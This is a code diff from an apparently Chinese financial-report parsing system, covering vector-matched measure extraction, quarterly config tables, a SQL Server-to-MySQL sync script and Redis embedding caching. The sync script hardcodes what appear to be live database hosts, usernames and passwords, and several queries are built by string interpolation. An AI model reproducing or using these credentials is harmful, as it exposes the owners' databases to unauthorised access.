        start_time = time.time()
        cursor.execute(select_query_thrid)
@ -243,6 +261,9 @@ def update_ori_measure(conn,cursor,file_id):

    if report_type == 0:
        table_name = "measure_config"
    elif report_type == 2:
        table_name = "measure_config_first_quarter"

    elif report_type == 3:
        table_name = "measure_config_third_quarter"
    else:
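Reading these branches together with the log messages, the report_type encoding appears to be 0 = annual, 1 = semi-annual, 2 = first quarter, 3 = third quarter (an inference from this diff, not a documented contract). A table-driven form of the lookup above:

# Inferred mapping; report_type 1 (semi-annual) takes a separate code path.
REPORT_TYPE_TO_CONFIG_TABLE = {
    0: "measure_config",                  # annual report
    2: "measure_config_first_quarter",    # Q1 report
    3: "measure_config_third_quarter",    # Q3 report
}
table_name = REPORT_TYPE_TO_CONFIG_TABLE.get(report_type)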
@ -342,7 +363,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
    measure_index_records = cursor_app.fetchall()
    for measure_index_record in measure_index_records:
        measure_index_array.append(measure_index_record[0])

    if str(report_type) == "2":
        table_index_array = []
        measure_index_array = []

    applog.info(f'Blacklist inputs: {parent_table_pages} and {table_index_array}, plus new {measure_index_array}')
    applog.info(f"black_array:{black_array}")

    record_start = record_range.split('-')[0]
    record_end = record_range.split('-')[1]
@ -368,6 +396,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
        output_fields=["measure_name","measure_value","table_num","table_index","measure_unit"],
        filter=filter_str
    )

    # Convert the output to a formatted JSON string
    # for i in range(len(res[0])):
@ -387,16 +417,18 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
        # Skip pages/table indexes whose above-table text hit blacklist keywords
        if f"{table_num}" in table_index_array:
            continue

        # Skip measures that contain blacklist keywords
        if utils.check_pdf_measure_black_list(pdf_measure):
            continue

        if f"{table_num}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
        #if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
            applog.info(f'Third-layer rule removed measure {pdf_measure} on page {table_num}')
            continue

        if vector_distance > distance and table_num not in parent_table_pages:
            # Validation rules start
            # Check that the extracted measure and the report measure cover the same period
@ -406,7 +438,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
            applog.info(f'Check 1: {ori_period} vs {pdf_period}')
            if(ori_period != pdf_period):
                continue

            # Check whether the extracted and report measures are period-start measures
            start_ori_period = utils.get_start_period_type(ori_measure_name)
            start_pdf_period = utils.get_start_period_type(pdf_measure)
@ -422,6 +455,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
            applog.info(f'Check 3: {ori_season_type} vs {pdf_season_type}')
            if(ori_season_type != pdf_season_type):
                continue

            # Check whether both are ex-non-recurring ("koufei") measures
            ori_kf_type = utils.get_kf_flag(ori_measure_name)
@ -429,8 +463,9 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
            if pdf_measure == '2023年6月30日货币资金合计':
                applog.info(f'Check 4: {ori_kf_type} vs {pdf_kf_type}')
            if(ori_kf_type != pdf_kf_type):
                applog.info(f'Non-recurring flag mismatch: measure {pdf_measure} on page {table_num}')
                continue

            # Check that both measures have the same type, i.e. whether both are percentages
            ori_type = utils.get_percent_flag(ori_measure_name)
            pdf_type = utils.get_percent_flag(pdf_measure)
@ -459,12 +494,13 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
            check_records = cursor.fetchall()
            if(len(check_records)) > 0:
                continue

            # Check the blacklist
            if(utils.check_black_list(measure_name,pdf_measure,black_array)):
                continue

            if(utils.check_white_list(measure_name,pdf_measure)):
                applog.info(f"measure_name{measure_name},pdf_measure{pdf_measure}")
                continue

            # Check that both measures are growth-type, e.g. year-on-year change counts as growth
@ -483,7 +519,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
            if(ori_report_start != pdf_report_start):
                continue

            # Validation rules end
            # Fetch the measure's unit, except for percentages
            if(utils.get_percent_flag(measure_name) == '0'):
@ -496,7 +532,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                    unit = unit_records[0][0]
                else:
                    unit = '元'

            data_to_insert = (file_id, file_name, "table", int(table_num), int(table_index), ori_measure_id, ori_measure_name, measure_value, create_time, create_time, vector_distance, pdf_measure,measure_id,measure_name,unit)
            cursor.execute(insert_query, data_to_insert)
            conn.commit()
@ -508,6 +544,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
    conn.close()
    client.close()

#
def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_name):
    select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
    cursor.execute(select_year_select)
@ -527,10 +564,16 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
        SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_third_quarter
        where year = '{year}'
    '''.format(year=report_year)
    select_query_first_quarter = '''
        SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
        where year = '{year}'
    '''.format(year=report_year)
    # select_black_array_query = 'SELECT measure_name, keywords FROM measure_black_list where isdel = 0'
    select_black_array_query = '''
        SELECT measure_name, keywords FROM measure_black_list where isdel = 0 and find_in_set('{year}',year) and find_in_set('{flag}',flag)
    '''.format(year=report_year, flag=report_type)

    black_array = []
    cursor.execute(select_black_array_query)
    results = cursor.fetchall()
@ -553,6 +596,20 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
            processes.append(p)
            p.start()
    elif report_type == 2:
        start_time = time.time()
        cursor.execute(select_query_first_quarter)
        records = cursor.fetchall()
        end_time = time.time()
        applog.info(f"Vector config query took {(end_time - start_time):.2f} s.")
        applog.info('insert_table_measure_from_vector_async_process took the first-quarter branch')
        start_time = time.time()
        records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
        processes = []
        for record_range in records_range_parts:
            p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
            processes.append(p)
            p.start()
    elif report_type == 3:
        start_time = time.time()
        cursor.execute(select_query_thrid)
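utils.get_range is not shown in this diff; judging by how record_range.split('-') is consumed above, it yields contiguous "start-end" index ranges, one per worker process. A hypothetical equivalent (an assumption, not the repo's code):

def get_range(total: int, workers: int) -> list[str]:
    # Split [0, total) into up to `workers` contiguous "start-end" chunks.
    if total == 0:
        return []
    step = (total + workers - 1) // workers
    return [f"{start}-{min(start + step, total)}" for start in range(0, total, step)]

# get_range(10, 3) -> ['0-4', '4-8', '8-10']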
@ -698,11 +755,15 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
        measure_list = table['measure_list']
        for measure in measure_list:
            measure_name = measure['measure_name']
            # Measures to skip
            black_list = ["营业总成本"]
            if any(black in measure_name for black in black_list):
                continue
            measure_value = measure['measure_value'].replace("(", "").replace(")", "")
            measure_name = utils.get_clean_text(measure_name)
            measure_name = measure_name.replace('2024','2024年').replace('2023','2023年').replace('2022','2022年').replace('(','').replace(')','')  # these characters survive every other cleanup step
            measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('(','').replace(')','')  # these characters survive every other cleanup step
            #measure_name_1 = measure_name.replace('调整后','')
            quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2024年','2023年','2022年','2021年','年']
            quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2023年','2022年','2021年','年']
            for quarter in quarters:
                measure_name = measure_name.replace(quarter * 2, quarter)
            pattern_dup = re.compile(r'(\w{3,})\1+')  # collapse any repeated run of 3+ word characters
@ -712,7 +773,6 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
            measure_name = pattern_dup.sub(r'\1', measure_name)
            measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
            measure_unit = measure['measure_unit']

            if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
                vector_obj = utils.embed_with_str(measure_name_1)
                vector = vector_obj.output["embeddings"][0]["embedding"]
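The dedup regex above is terse; a quick check of its behavior on doubled headers (illustrative strings only):

import re

pattern_dup = re.compile(r'(\w{3,})\1+')  # a run of 3+ word chars repeated back-to-back
print(pattern_dup.sub(r'\1', '营业收入营业收入'))  # -> 营业收入
print(pattern_dup.sub(r'\1', 'abcabcabc'))        # -> abc
print(pattern_dup.sub(r'\1', '净利润'))            # unchanged: nothing repeats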
@ -822,7 +882,6 @@ def delete_database(file_id):
        "delete from measure_list where file_id = %s;",
        "delete from word_parse_process where file_id = %s;",
        "delete from table_unit_info where file_id = %s;",
        "delete from word_measure_parse_process where file_id = %s;",
        # "delete from a where file_id = %s;",
        # "delete from b where file_id = %s;",
    ]
@ -0,0 +1,201 @@
|
|||
import pymssql
|
||||
import mysql.connector
|
||||
import logging
|
||||
|
||||
# 配置日志
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# SQL Server配置
|
||||
sql_server_config = {
|
||||
"server": "203.192.15.17",
|
||||
"port": 28063,
|
||||
"user": "zncbuser",
|
||||
"password": "ZZB-Cbindex-data",
|
||||
"database": "jydb",
|
||||
}
|
||||
|
||||
# MySQL配置
|
||||
mysql_config = {
|
||||
"host": "rm-bp1f85h3xs6mvnf5e3o.mysql.rds.aliyuncs.com",
|
||||
"user": "zzb_jydb",
|
||||
"password": "Ysdbsdjs89Yrqwp",
|
||||
"database": "zzb_jydb",
|
||||
}
|
||||
|
||||
def sync_table(table_name):
|
||||
try:
|
||||
# 连接到SQL Server
|
||||
sql_server_conn = pymssql.connect(**sql_server_config)
|
||||
sql_server_cursor = sql_server_conn.cursor()
|
||||
|
||||
# 连接到MySQL
|
||||
mysql_conn = mysql.connector.connect(**mysql_config)
|
||||
mysql_cursor = mysql_conn.cursor()
|
||||
|
||||
logging.info(f"Processing table: {table_name}")
|
||||
|
||||
# 检查MySQL中是否已存在该表
|
||||
mysql_cursor.execute(f"SHOW TABLES LIKE '{table_name}'")
|
||||
table_exists = mysql_cursor.fetchone()
|
||||
|
||||
# 获取表的列信息
|
||||
sql_server_cursor.execute(f"""
|
||||
SELECT
|
||||
COLUMN_NAME,
|
||||
DATA_TYPE,
|
||||
CHARACTER_MAXIMUM_LENGTH,
|
||||
NUMERIC_PRECISION,
|
||||
NUMERIC_SCALE
|
||||
FROM INFORMATION_SCHEMA.COLUMNS
|
||||
WHERE TABLE_NAME = '{table_name}'
|
||||
""")
|
||||
columns = sql_server_cursor.fetchall()
|
||||
|
||||
# 检查是否存在 XGRQ 或 UpdateTime 字段
|
||||
update_time_fields = ['xgrq', 'updatetime'] # 可能的字段名
|
||||
update_time_field = None
|
||||
for col in columns:
|
||||
if col[0].lower() in update_time_fields:
|
||||
update_time_field = col[0] # 找到第一个匹配的字段
|
||||
break
|
||||
|
||||
logging.info(f"Table {table_name} has update time field: {update_time_field}")
|
||||
|
||||
if not table_exists:
|
||||
# 如果表不存在,创建表
|
||||
create_table_sql = f"CREATE TABLE {table_name} ("
|
||||
for col in columns:
|
||||
col_name = col[0]
|
||||
col_type = col[1]
|
||||
# 类型映射逻辑(略)
|
||||
create_table_sql += f"`{col_name}` {col_type}, "
|
||||
create_table_sql = create_table_sql.rstrip(", ") + ")"
|
||||
logging.info(f"Create table SQL: {create_table_sql}")
|
||||
|
||||
# 在MySQL中创建表
|
||||
mysql_cursor.execute(create_table_sql)
|
||||
logging.info(f"Table {table_name} created in MySQL.")
|
||||
else:
|
||||
logging.info(f"Table {table_name} already exists in MySQL. Updating data...")
|
||||
|
||||
# 获取SQL Server中的所有id
|
||||
sql_server_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
|
||||
sql_server_ids = {row[0] for row in sql_server_cursor.fetchall()}
|
||||
|
||||
# 获取MySQL中的所有id
|
||||
mysql_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
|
||||
mysql_ids = {row[0] for row in mysql_cursor.fetchall()}
|
||||
|
||||
# 找出需要插入的id
|
||||
ids_to_insert = sql_server_ids - mysql_ids
|
||||
logging.info(f"Found {len(ids_to_insert)} new rows to insert.")
|
||||
|
||||
# 分批插入数据
|
||||
        batch_size = 10000  # rows per batch
        id_list = list(ids_to_insert)
        for i in range(0, len(id_list), batch_size):
            batch_ids = id_list[i:i + batch_size]

            # Fetch the rows to insert from SQL Server
            sql_server_cursor.execute(f"""
                SELECT * FROM {table_name}
                WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
            """)
            rows_to_insert = sql_server_cursor.fetchall()

            # Insert the batch into MySQL
            if rows_to_insert:
                insert_sql = f"INSERT INTO {table_name} ({', '.join([f'`{col[0]}`' for col in columns])}) VALUES ({', '.join(['%s'] * len(columns))})"
                mysql_cursor.executemany(insert_sql, rows_to_insert)
                mysql_conn.commit()
                logging.info(f"Inserted {len(rows_to_insert)} rows into {table_name}.")

        # If the table carries an update-time field (XGRQ or UpdateTime), look for rows to update
        if update_time_field:
            logging.info(f"Checking for updates based on {update_time_field} field in table: {table_name}")

            # Fetch id and update-time values from SQL Server, restricted to rows updated after late 2023
            sql_server_cursor.execute(f"""
                SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
                WHERE {update_time_field} > '2023-11-12 20:23:23'
            """)
            sql_server_update_data = {row[0]: row[1] for row in sql_server_cursor.fetchall()}

            # Fetch id and update-time values from MySQL
            mysql_cursor.execute(f"""
                SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
            """)
            mysql_update_data = {row[0]: row[1] for row in mysql_cursor.fetchall()}

            # Collect the ids whose update time differs between the two sides
            ids_to_update = []
            for id, sql_server_update_time in sql_server_update_data.items():
                if id in mysql_update_data and sql_server_update_time != mysql_update_data[id]:
                    ids_to_update.append(id)

            logging.info(f"Found {len(ids_to_update)} rows to update.")

            # Update in batches
            for i in range(0, len(ids_to_update), batch_size):
                batch_ids = ids_to_update[i:i + batch_size]

                # Fetch the rows to update from SQL Server, again restricted to rows updated after late 2023
                sql_server_cursor.execute(f"""
                    SELECT * FROM {table_name}
                    WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
                    AND {update_time_field} > '2023-11-12 20:23:23'
                """)
                rows_to_update = sql_server_cursor.fetchall()

                # Apply the updates to MySQL
                if rows_to_update:
                    update_sql = f"UPDATE {table_name} SET "
                    update_sql += ", ".join([f"`{col[0]}` = %s" for col in columns[1:]])  # skip the id column
                    update_sql += f" WHERE `{columns[0][0]}` = %s"
                    update_values = [list(row[1:]) + [row[0]] for row in rows_to_update]  # id moves to the WHERE clause
                    mysql_cursor.executemany(update_sql, update_values)
                    mysql_conn.commit()
                    logging.info(f"Updated {len(rows_to_update)} rows in table {table_name}.")

        logging.info(f"Sync completed for table: {table_name}")
    except Exception as e:
        logging.error(f"Failed to sync table {table_name}. Error: {e}")
    finally:
        # Close the connections
        if 'sql_server_cursor' in locals():
            sql_server_cursor.close()
        if 'sql_server_conn' in locals():
            sql_server_conn.close()
        if 'mysql_cursor' in locals():
            mysql_cursor.close()
        if 'mysql_conn' in locals():
            mysql_conn.close()


def main():
    try:
        # Connect to SQL Server
        sql_server_conn = pymssql.connect(**sql_server_config)
        sql_server_cursor = sql_server_conn.cursor()

        # List all base tables in SQL Server
        sql_server_cursor.execute("SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' ORDER BY TABLE_NAME")
        tables = sql_server_cursor.fetchall()

        # Sync each table (currently restricted to lc_mainshlistnew)
        for table in tables:
            if table[0].lower() == "lc_mainshlistnew":
                sync_table(table[0])

        logging.info("All tables synced successfully!")
    except Exception as e:
        logging.error(f"Main function failed. Error: {e}")
    finally:
        # Close the connections
        if 'sql_server_cursor' in locals():
            sql_server_cursor.close()
        if 'sql_server_conn' in locals():
            sql_server_conn.close()


# Entry point
if __name__ == "__main__":
    main()
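
The batched `IN (...)` clauses above are spliced into the SQL as text, which only works cleanly for numeric keys and bypasses parameter escaping. A minimal parameterized variant of the batch fetch, assuming pymssql's `%s` placeholder style (the helper name is illustrative, not part of the script):

    def fetch_batch(cursor, table_name, id_column, batch_ids):
        # One %s placeholder per id; the values travel as parameters, not as SQL text
        placeholders = ', '.join(['%s'] * len(batch_ids))
        cursor.execute(
            f"SELECT * FROM {table_name} WHERE {id_column} IN ({placeholders})",
            tuple(batch_ids)
        )
        return cursor.fetchall()

Table and column names still have to be interpolated, but here they come from INFORMATION_SCHEMA rather than user input.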

File diff suppressed because it is too large

@ -0,0 +1,294 @@
import pandas as pd
import mysql.connector
import utils
from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB  # needed by process_excel_and_db
import re
import redis


def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
    # Read the first Excel file (corresponds to the ttt table)
    df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)
    # Convert the DataFrame to a list of dicts
    data_list = df.to_dict(orient='records')

    # Connect to the MySQL database
    conn = mysql.connector.connect(
        host=MYSQL_HOST,
        user=MYSQL_USER,
        password=MYSQL_PASSWORD,
        database=MYSQL_DB
    )
    cursor = conn.cursor()

    # Insert rows into the measure_create_config table
    insert_query = '''
        INSERT INTO measure_create_config
        (config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
        VALUES (%s, %s, %s, %s, %s, %s)
    '''
    for data in data_list:
        show_measure = str(data['指标'])
        same_mean_measure = str(data['同义表述'])
        period_measure = str(data['周期'])
        change_measure = str(data['变动'])
        black_list = str(data['黑名单词'])
        config_id = utils.get_md5(show_measure)
        insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
        cursor.execute(insert_query, insert_query_data)
    conn.commit()

    # Read the second Excel file (corresponds to the period table)
    df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)
    # Convert the DataFrame to a list of dicts
    period_list = df_period.to_dict(orient='records')

    # Insert rows into the measure_create_period table
    period_insert_query = '''
        INSERT INTO measure_create_period
        (period_name, same_mean_period)
        VALUES (%s, %s)
    '''
    for data in period_list:
        period_name = str(data['标准表述'])
        same_mean_period = str(data['同义表述'])
        insert_query_data = (period_name, same_mean_period)
        cursor.execute(period_insert_query, insert_query_data)
    conn.commit()

    # Query the database
    data_query = '''
        SELECT * FROM measure_create_config WHERE delete_status = 0
    '''
    period_query = '''
        SELECT * FROM measure_create_period
    '''

    cursor.execute(data_query)
    data_list = cursor.fetchall()

    cursor.execute(period_query)
    period_list = cursor.fetchall()

    # Write the generated measure name pairs to the output file
    with open(output_file_path, 'w', encoding='utf-8') as file:
        for data in data_list:
            config_id = data[0]
            show_measure = data[1]
            same_mean_measure = data[2]
            period_measure = data[3]
            change_measure = data[4]
            same_mean_measure_arr = []
            period_measure_arr = []
            change_measure_arr = []

            if same_mean_measure != 'nan':
                same_mean_measure_arr = same_mean_measure.split(',')
                same_mean_measure_arr.append(show_measure)
            if period_measure != 'nan':
                period_measure_arr = period_measure.split(',')
            if change_measure != 'nan':
                change_measure_arr = change_measure.split(',')

            for c in change_measure_arr:
                period_measure_arr.append(c)

            for x in period_measure_arr:
                if x in change_measure_arr:
                    show_name = show_measure + x
                else:
                    show_name = x + show_measure
                for y in same_mean_measure_arr:
                    if x in change_measure_arr:  # membership test against the split list, not the raw comma-joined string
                        parser_name = y + x
                    else:
                        parser_name = x + y

                    file.write(f'{show_name},{parser_name}\n')

                    for p in period_list:
                        period_exra_name = p[0]
                        period_exra_value = p[1]
                        if period_exra_name in x:
                            for v in period_exra_value.split(','):
                                if x in change_measure_arr:
                                    parser_name = y + x.replace(period_exra_name, v)
                                else:
                                    parser_name = x.replace(period_exra_name, v) + y
                                file.write(f'{show_name},{parser_name}\n')

    cursor.close()
    conn.close()


# Generate the new year's measure config rows from the old year's config table
def create_new_config(conn, cursor, table_name, old_year, new_year):
    select_query = f'''
        SELECT measure_id, measure_name, ori_measure_id, ori_measure_name, delete_status, measure_vector, distance, year
        FROM {table_name}
        WHERE year = '{old_year}'
    '''
    cursor.execute(select_query)
    data_list = cursor.fetchall()

    # Note: reads from {table_name} but always inserts into measure_config
    insert_query = f'''
        INSERT INTO measure_config
        (measure_id, measure_name, ori_measure_id, ori_measure_name, delete_status, measure_vector, distance, year)
        VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
    '''
    for data in data_list:
        ori_measure_name = data[3]
        # If the name starts with a four-digit year, roll it forward by one
        if re.match(r'^\d{4}', ori_measure_name):
            year = int(re.match(r'^\d{4}', ori_measure_name).group(0))
            year += 1
            ori_measure_name = str(year) + ori_measure_name[4:]
        insert_data = (data[0], data[1], data[2], ori_measure_name, data[4], data[5], data[6], new_year)
        cursor.execute(insert_query, insert_data)
    conn.commit()
    # Do not close conn/cursor here: the caller reuses the same connection
    # for insert_measure_vector afterwards.


def measure_config_to_db(conn, cursor, table_name):
    year_list = ["2021","2022","2023","2024","2025"]
    for year in year_list:
        insert_query = f'''
            INSERT INTO {table_name}
            (measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year)
            VALUES (%s, %s, %s, %s,%s,%s,%s)
        '''
        check_query = f'''
            SELECT ori_measure_id FROM {table_name}
            WHERE year = '{year}'
        '''
        # Newly added measures
        lines = [

            f"归母净利润同比变动,本报告期比上年同期增减归属于上市公司股东的净利润",
            f"扣非净利润同比变动,本报告期比上年同期增减归属于上市公司股东的扣除非经常性损益的净利润",


            # f"当期营业成本,本期发生额营业成本",
            # f"当期销售费用,本期发生额销售费用",
            # f"当期管理费用,本期发生额管理费用",
            # f"当期财务费用,本期发生额财务费用",
            # f"当期研发费用,本期发生额研发费用",
            # f"报告期末应收账款,本期发生额应收账款",
            # f"当期营业收入,本期发生额营业收入",

            # f"当期营业成本,{year}年第一季度营业成本",
            # f"当期销售费用,{year}年第一季度销售费用",
            # f"当期管理费用,{year}年第一季度管理费用",
            # f"当期财务费用,{year}年第一季度财务费用",
            # f"当期研发费用,{year}年第一季度研发费用",
            # f"报告期末应收账款,{year}年3月31日应收账款",
            # f"当期营业收入,{year}年第一季度营业收入",

            # f"报告期末总资产,{year}年3月31日资产",
            # f"报告期末总资产,{year}年3月31日资产总计",
            # f"报告期末货币资金,{year}年3月31日货币资金",
            # f"报告期末货币资金,{year}年3月31日货币资金合计",
            # f"报告期末存货,{year}年3月31日存货",
            # f"报告期末存货,{year}年3月31日存货合计",
            # f"报告期末固定资产,{year}年3月31日固定资产",
            # f"报告期末固定资产,{year}年3月31日固定资产合计",
            # f"报告期末在建工程,{year}年3月31日在建工程",
            # f"报告期末在建工程,{year}年3月31日在建工程合计",
            # f"报告期末商誉,{year}年3月31日商誉",
            # f"报告期末商誉,{year}年3月31日商誉合计",
            # f"报告期末短期借款,{year}年3月31日短期借款",
            # f"报告期末短期借款,{year}年3月31日短期借款合计",
            # f"报告期末应付账款,{year}年3月31日应付账款",
            # f"报告期末应付账款,{year}年3月31日应付账款合计",
            # f"报告期末合同负债,{year}年3月31日合同负债",
            # f"报告期末合同负债,{year}年3月31日合同负债合计",
            # f"报告期末长期借款,{year}年3月31日长期借款",
            # f"报告期末长期借款,{year}年3月31日长期借款合计",

            # f"上年年末总资产,{int(year)-1}年12月31日资产",
            # f"上年年末总资产,{int(year)-1}年12月31日资产总计",
            # f"上年年末货币资金,{int(year)-1}年12月31日货币资金",
            # f"上年年末货币资金,{int(year)-1}年12月31日货币资金合计",
            # f"上年年末存货,{int(year)-1}年12月31日存货",
            # f"上年年末存货,{int(year)-1}年12月31日存货合计",
            # f"上年年末固定资产,{int(year)-1}年12月31日固定资产",
            # f"上年年末固定资产,{int(year)-1}年12月31日固定资产合计",
            # f"上年年末在建工程,{int(year)-1}年12月31日在建工程",
            # f"上年年末在建工程,{int(year)-1}年12月31日在建工程合计",
            # f"上年年末商誉,{int(year)-1}年12月31日商誉",
            # f"上年年末商誉,{int(year)-1}年12月31日商誉合计",
            # f"上年年末短期借款,{int(year)-1}年12月31日短期借款",
            # f"上年年末短期借款,{int(year)-1}年12月31日短期借款合计",

            # f"上年年末合同负债,{int(year)-1}年12月31日合同负债",
            # f"上年年末合同负债,{int(year)-1}年12月31日合同负债合计",
            # f"上年年末长期借款,{int(year)-1}年12月31日长期借款",
            # f"上年年末长期借款,{int(year)-1}年12月31日长期借款合计",
        ]
        # Process each config line
        for line in lines:
            config_list = line.strip().split(',')
            measure = config_list[0]
            ori_measure = config_list[1]
            ori_measure_id = utils.get_md5(ori_measure)

            # Skip measures that already exist in the database for this year
            cursor.execute(check_query)
            check_records = cursor.fetchall()
            if any(record[0] == ori_measure_id for record in check_records):
                continue

            data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure, 0, 0.94, year)
            cursor.execute(insert_query, data_to_insert)
        conn.commit()


def insert_measure_vector(conn, cursor, table_name):
    from config import REDIS_HOST, REDIS_PASSWORD, REDIS_PORT
    redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)  # prod 192.168.0.172, test 123.60.153.169
    # Read every measure and make sure its embedding is cached in Redis
    select_query = f'''
        SELECT ori_measure_id, ori_measure_name FROM {table_name}
    '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    print(f"总计{len(records)}条数据")
    for record in records:
        if redis_client.hexists('measure_config', record[0]):
            measure_vector = redis_client.hget('measure_config', record[0])
        else:
            print('新增指标', record[1])
            vector_obj = utils.embed_with_str(record[1])
            measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])

        redis_client.hset('measure_config', record[0], measure_vector)
    redis_client.close()
    conn.close()


if __name__ == "__main__":
    # Empty the local measure_create_config and measure_create_period tables first
    # process_excel_and_db(
    #     'F:\\11_pdf\\ttt_1.xlsx',            # ttt file
    #     'F:\\11_pdf\\period_1.xlsx',         # period file
    #     'F:\\11_pdf\\out_2022_new_year.txt'  # output file
    # )
    from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
    conn = mysql.connector.connect(
        host=MYSQL_HOST_APP,
        user=MYSQL_USER_APP,
        password=MYSQL_PASSWORD_APP,
        database=MYSQL_DB_APP
    )
    cursor = conn.cursor()
    # file_path = r'F:\\11_pdf\\out_2022_new_year.txt'

    # Refresh the first-quarter measure_vector entries
    table_name = 'measure_config_first_quarter'
    # Write to MySQL
    # measure_config_to_db(conn, cursor, table_name)
    create_new_config(conn, cursor, table_name, '2024', '2025')
    # Populate Redis
    insert_measure_vector(conn, cursor, table_name)

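The Redis hash in insert_measure_vector doubles as an embedding cache keyed by the measure's MD5. The same get-or-compute pattern as a standalone helper, assuming `embed_fn` returns a DashScope-style response object (the helper and its decode step are illustrative):

    def get_or_embed(redis_client, cache_key, field_id, text, embed_fn):
        # Return the cached vector string, computing and caching it on a miss
        cached = redis_client.hget(cache_key, field_id)
        if cached is not None:
            return cached.decode('utf-8')  # redis-py returns bytes by default
        resp = embed_fn(text)
        vector = str(resp.output["embeddings"][0]["embedding"])
        redis_client.hset(cache_key, field_id, vector)
        return vector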

@ -1,204 +0,0 @@
2024-12-29 16:13:29,975|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:13:36,106|zzb_logger : INFO 任务 201917 完成
2024-12-29 16:15:16,205|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:15:22,356|zzb_logger : INFO 任务 201917 完成
2024-12-29 16:17:15,693|zzb_logger : INFO 开始启动文件解析任务: 1.docx
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=5
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code: 404</p>
<p>Message: File not found.</p>
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
</body>
</html>

2024-12-29 16:17:25,319|zzb_logger : INFO text,任务ID:201917
2024-12-29 16:17:26,701|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (5116)...
2024-12-29 16:17:28,173|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (22268)...
2024-12-29 16:17:29,591|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (27736)...
2024-12-29 16:17:30,937|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38276)...
2024-12-29 16:17:32,294|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38292)...
2024-12-29 16:17:33,664|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38240)...
2024-12-29 16:17:35,153|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (28536)...
2024-12-29 16:17:36,559|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37552)...
2024-12-29 16:17:37,929|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37856)...
2024-12-29 16:17:39,291|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (10528)...
2024-12-29 16:17:40,688|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (31444)...
2024-12-29 16:17:42,133|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (11108)...
2024-12-29 16:17:43,518|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23236)...
